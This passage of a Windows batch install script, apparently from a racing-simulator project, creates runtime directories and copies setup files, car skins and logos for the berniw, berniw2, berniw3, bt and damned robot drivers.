if exist .\src\drivers\berniw\5\car3-trb1.rgb copy .\src\drivers\berniw\5\car3-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\5\car3-trb1.rgb
if exist .\src\drivers\berniw\5\default.xml copy .\src\drivers\berniw\5\default.xml .\%RUNTIMEDIR%\drivers\berniw\5\default.xml
if exist .\src\drivers\berniw\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\6
if exist .\src\drivers\berniw\6\car4-trb1.rgb copy .\src\drivers\berniw\6\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\6\car4-trb1.rgb
if exist .\src\drivers\berniw\6\default.xml copy .\src\drivers\berniw\6\default.xml .\%RUNTIMEDIR%\drivers\berniw\6\default.xml
if exist .\src\drivers\berniw\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\7
if exist .\src\drivers\berniw\7\default.xml copy .\src\drivers\berniw\7\default.xml .\%RUNTIMEDIR%\drivers\berniw\7\default.xml
if exist .\src\drivers\berniw\7\car5-trb1.rgb copy .\src\drivers\berniw\7\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\7\car5-trb1.rgb
if exist .\src\drivers\berniw\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\8
if exist .\src\drivers\berniw\8\default.xml copy .\src\drivers\berniw\8\default.xml .\%RUNTIMEDIR%\drivers\berniw\8\default.xml
if exist .\src\drivers\berniw\8\car6-trb1.rgb copy .\src\drivers\berniw\8\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\8\car6-trb1.rgb
if exist .\src\drivers\berniw\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\9
if exist .\src\drivers\berniw\9\default.xml copy .\src\drivers\berniw\9\default.xml .\%RUNTIMEDIR%\drivers\berniw\9\default.xml
if exist .\src\drivers\berniw\9\car7-trb1.rgb copy .\src\drivers\berniw\9\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\9\car7-trb1.rgb
rem Robot-level descriptor and logo.
if exist .\src\drivers\berniw\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\berniw.xml copy .\src\drivers\berniw\berniw.xml .\%RUNTIMEDIR%\drivers\berniw\berniw.xml
if exist .\src\drivers\berniw\logo.rgb copy .\src\drivers\berniw\logo.rgb .\%RUNTIMEDIR%\drivers\berniw\logo.rgb
rem Install the berniw2 robot runtime data into %RUNTIMEDIR%\drivers\berniw2\<n>.
rem Most driver slots ship only a default.xml setup; slots 7-10 also carry
rem a car skin (.rgb). Guarded copies tolerate partial source trees.
if exist .\src\drivers\berniw2\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\1
if exist .\src\drivers\berniw2\1\default.xml copy .\src\drivers\berniw2\1\default.xml .\%RUNTIMEDIR%\drivers\berniw2\1\default.xml
if exist .\src\drivers\berniw2\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\10
if exist .\src\drivers\berniw2\10\car1-trb3.rgb copy .\src\drivers\berniw2\10\car1-trb3.rgb .\%RUNTIMEDIR%\drivers\berniw2\10\car1-trb3.rgb
if exist .\src\drivers\berniw2\10\default.xml copy .\src\drivers\berniw2\10\default.xml .\%RUNTIMEDIR%\drivers\berniw2\10\default.xml
if exist .\src\drivers\berniw2\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\2
if exist .\src\drivers\berniw2\2\default.xml copy .\src\drivers\berniw2\2\default.xml .\%RUNTIMEDIR%\drivers\berniw2\2\default.xml
if exist .\src\drivers\berniw2\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\3
if exist .\src\drivers\berniw2\3\default.xml copy .\src\drivers\berniw2\3\default.xml .\%RUNTIMEDIR%\drivers\berniw2\3\default.xml
if exist .\src\drivers\berniw2\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\4
if exist .\src\drivers\berniw2\4\default.xml copy .\src\drivers\berniw2\4\default.xml .\%RUNTIMEDIR%\drivers\berniw2\4\default.xml
if exist .\src\drivers\berniw2\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\5
if exist .\src\drivers\berniw2\5\default.xml copy .\src\drivers\berniw2\5\default.xml .\%RUNTIMEDIR%\drivers\berniw2\5\default.xml
if exist .\src\drivers\berniw2\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\6
if exist .\src\drivers\berniw2\6\default.xml copy .\src\drivers\berniw2\6\default.xml .\%RUNTIMEDIR%\drivers\berniw2\6\default.xml
if exist .\src\drivers\berniw2\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\7
if exist .\src\drivers\berniw2\7\car5-trb1.rgb copy .\src\drivers\berniw2\7\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw2\7\car5-trb1.rgb
if exist .\src\drivers\berniw2\7\default.xml copy .\src\drivers\berniw2\7\default.xml .\%RUNTIMEDIR%\drivers\berniw2\7\default.xml
if exist .\src\drivers\berniw2\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\8
if exist .\src\drivers\berniw2\8\car4-trb1.rgb copy .\src\drivers\berniw2\8\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw2\8\car4-trb1.rgb
if exist .\src\drivers\berniw2\8\default.xml copy .\src\drivers\berniw2\8\default.xml .\%RUNTIMEDIR%\drivers\berniw2\8\default.xml
if exist .\src\drivers\berniw2\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\9
if exist .\src\drivers\berniw2\9\default.xml copy .\src\drivers\berniw2\9\default.xml .\%RUNTIMEDIR%\drivers\berniw2\9\default.xml
if exist .\src\drivers\berniw2\9\car7-trb1.rgb copy .\src\drivers\berniw2\9\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw2\9\car7-trb1.rgb
rem Robot-level descriptor and logo.
if exist .\src\drivers\berniw2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\berniw2.xml copy .\src\drivers\berniw2\berniw2.xml .\%RUNTIMEDIR%\drivers\berniw2\berniw2.xml
if exist .\src\drivers\berniw2\logo.rgb copy .\src\drivers\berniw2\logo.rgb .\%RUNTIMEDIR%\drivers\berniw2\logo.rgb
rem Install the berniw3 robot runtime data into %RUNTIMEDIR%\drivers\berniw3\<n>.
rem Each driver slot 1-10 ships only a default.xml setup file here.
if exist .\src\drivers\berniw3\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\1
if exist .\src\drivers\berniw3\1\default.xml copy .\src\drivers\berniw3\1\default.xml .\%RUNTIMEDIR%\drivers\berniw3\1\default.xml
if exist .\src\drivers\berniw3\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\10
if exist .\src\drivers\berniw3\10\default.xml copy .\src\drivers\berniw3\10\default.xml .\%RUNTIMEDIR%\drivers\berniw3\10\default.xml
if exist .\src\drivers\berniw3\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\2
if exist .\src\drivers\berniw3\2\default.xml copy .\src\drivers\berniw3\2\default.xml .\%RUNTIMEDIR%\drivers\berniw3\2\default.xml
if exist .\src\drivers\berniw3\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\3
if exist .\src\drivers\berniw3\3\default.xml copy .\src\drivers\berniw3\3\default.xml .\%RUNTIMEDIR%\drivers\berniw3\3\default.xml
if exist .\src\drivers\berniw3\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\4
if exist .\src\drivers\berniw3\4\default.xml copy .\src\drivers\berniw3\4\default.xml .\%RUNTIMEDIR%\drivers\berniw3\4\default.xml
if exist .\src\drivers\berniw3\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\5
if exist .\src\drivers\berniw3\5\default.xml copy .\src\drivers\berniw3\5\default.xml .\%RUNTIMEDIR%\drivers\berniw3\5\default.xml
if exist .\src\drivers\berniw3\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\6
if exist .\src\drivers\berniw3\6\default.xml copy .\src\drivers\berniw3\6\default.xml .\%RUNTIMEDIR%\drivers\berniw3\6\default.xml
if exist .\src\drivers\berniw3\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\7
if exist .\src\drivers\berniw3\7\default.xml copy .\src\drivers\berniw3\7\default.xml .\%RUNTIMEDIR%\drivers\berniw3\7\default.xml
if exist .\src\drivers\berniw3\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\8
if exist .\src\drivers\berniw3\8\default.xml copy .\src\drivers\berniw3\8\default.xml .\%RUNTIMEDIR%\drivers\berniw3\8\default.xml
if exist .\src\drivers\berniw3\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\9
if exist .\src\drivers\berniw3\9\default.xml copy .\src\drivers\berniw3\9\default.xml .\%RUNTIMEDIR%\drivers\berniw3\9\default.xml
rem Robot-level descriptor and logo.
if exist .\src\drivers\berniw3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\berniw3.xml copy .\src\drivers\berniw3\berniw3.xml .\%RUNTIMEDIR%\drivers\berniw3\berniw3.xml
if exist .\src\drivers\berniw3\logo.rgb copy .\src\drivers\berniw3\logo.rgb .\%RUNTIMEDIR%\drivers\berniw3\logo.rgb
rem Install the bt robot runtime data into %RUNTIMEDIR%\drivers\bt\<n>.
rem Slots 0 and 1 additionally get per-session subdirectories
rem (practice/qualifying/race), created empty here.
if exist .\src\drivers\bt\0\practice\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\0\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\0\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\0\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0
if exist .\src\drivers\bt\0\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0\practice
if exist .\src\drivers\bt\0\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\0\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\0\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\0\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0
if exist .\src\drivers\bt\0\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0\qualifying
if exist .\src\drivers\bt\0\race\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\0\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\0\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\0\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0
if exist .\src\drivers\bt\0\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0\race
if exist .\src\drivers\bt\0\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0
if exist .\src\drivers\bt\0\default.xml copy .\src\drivers\bt\0\default.xml .\%RUNTIMEDIR%\drivers\bt\0\default.xml
if exist .\src\drivers\bt\0\car1-stock1.rgb copy .\src\drivers\bt\0\car1-stock1.rgb .\%RUNTIMEDIR%\drivers\bt\0\car1-stock1.rgb
if exist .\src\drivers\bt\1\practice\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\1\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\1\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\1\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1
if exist .\src\drivers\bt\1\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1\practice
if exist .\src\drivers\bt\1\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\1\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\1\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\1\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1
if exist .\src\drivers\bt\1\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1\qualifying
if exist .\src\drivers\bt\1\race\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\1\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\1\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\1\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1
if exist .\src\drivers\bt\1\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1\race
if exist .\src\drivers\bt\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1
if exist .\src\drivers\bt\1\default.xml copy .\src\drivers\bt\1\default.xml .\%RUNTIMEDIR%\drivers\bt\1\default.xml
if exist .\src\drivers\bt\1\car1-stock1.rgb copy .\src\drivers\bt\1\car1-stock1.rgb .\%RUNTIMEDIR%\drivers\bt\1\car1-stock1.rgb
rem Slots 2-8: setup file plus one car skin each.
if exist .\src\drivers\bt\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\2
if exist .\src\drivers\bt\2\default.xml copy .\src\drivers\bt\2\default.xml .\%RUNTIMEDIR%\drivers\bt\2\default.xml
if exist .\src\drivers\bt\2\car1-trb1.rgb copy .\src\drivers\bt\2\car1-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\2\car1-trb1.rgb
if exist .\src\drivers\bt\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\3
if exist .\src\drivers\bt\3\default.xml copy .\src\drivers\bt\3\default.xml .\%RUNTIMEDIR%\drivers\bt\3\default.xml
if exist .\src\drivers\bt\3\car2-trb1.rgb copy .\src\drivers\bt\3\car2-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\3\car2-trb1.rgb
if exist .\src\drivers\bt\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\4
if exist .\src\drivers\bt\4\default.xml copy .\src\drivers\bt\4\default.xml .\%RUNTIMEDIR%\drivers\bt\4\default.xml
if exist .\src\drivers\bt\4\car3-trb1.rgb copy .\src\drivers\bt\4\car3-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\4\car3-trb1.rgb
if exist .\src\drivers\bt\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\5
if exist .\src\drivers\bt\5\default.xml copy .\src\drivers\bt\5\default.xml .\%RUNTIMEDIR%\drivers\bt\5\default.xml
if exist .\src\drivers\bt\5\car4-trb1.rgb copy .\src\drivers\bt\5\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\5\car4-trb1.rgb
if exist .\src\drivers\bt\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\6
if exist .\src\drivers\bt\6\default.xml copy .\src\drivers\bt\6\default.xml .\%RUNTIMEDIR%\drivers\bt\6\default.xml
if exist .\src\drivers\bt\6\car5-trb1.rgb copy .\src\drivers\bt\6\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\6\car5-trb1.rgb
if exist .\src\drivers\bt\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\7
if exist .\src\drivers\bt\7\default.xml copy .\src\drivers\bt\7\default.xml .\%RUNTIMEDIR%\drivers\bt\7\default.xml
if exist .\src\drivers\bt\7\car6-trb1.rgb copy .\src\drivers\bt\7\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\7\car6-trb1.rgb
if exist .\src\drivers\bt\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\8
if exist .\src\drivers\bt\8\default.xml copy .\src\drivers\bt\8\default.xml .\%RUNTIMEDIR%\drivers\bt\8\default.xml
if exist .\src\drivers\bt\8\car7-trb1.rgb copy .\src\drivers\bt\8\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\8\car7-trb1.rgb
if exist .\src\drivers\bt\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\9
if exist .\src\drivers\bt\9\default.xml copy .\src\drivers\bt\9\default.xml .\%RUNTIMEDIR%\drivers\bt\9\default.xml
if exist .\src\drivers\bt\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\bt.xml copy .\src\drivers\bt\bt.xml .\%RUNTIMEDIR%\drivers\bt\bt.xml
if exist .\src\drivers\bt\logo.rgb copy .\src\drivers\bt\logo.rgb .\%RUNTIMEDIR%\drivers\bt\logo.rgb
rem --- Driver "damned": stage per-car setup files (default.xml) and, for
rem --- cars 6-9, livery textures (*.rgb) from .\src\drivers\damned\<N> into
rem --- .\%RUNTIMEDIR%\drivers\damned\<N>, then the driver-level damned.xml
rem --- and logo. Same auto-generated guarded create_dir/copy pattern as the
rem --- other driver sections in this script; create_dir is an external
rem --- helper batch file (presumably mkdir-if-missing -- TODO confirm).
if exist .\src\drivers\damned\0\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\0
if exist .\src\drivers\damned\0\default.xml copy .\src\drivers\damned\0\default.xml .\%RUNTIMEDIR%\drivers\damned\0\default.xml
if exist .\src\drivers\damned\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\1
if exist .\src\drivers\damned\1\default.xml copy .\src\drivers\damned\1\default.xml .\%RUNTIMEDIR%\drivers\damned\1\default.xml
if exist .\src\drivers\damned\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\2
if exist .\src\drivers\damned\2\default.xml copy .\src\drivers\damned\2\default.xml .\%RUNTIMEDIR%\drivers\damned\2\default.xml
if exist .\src\drivers\damned\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\3
if exist .\src\drivers\damned\3\default.xml copy .\src\drivers\damned\3\default.xml .\%RUNTIMEDIR%\drivers\damned\3\default.xml
if exist .\src\drivers\damned\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\4
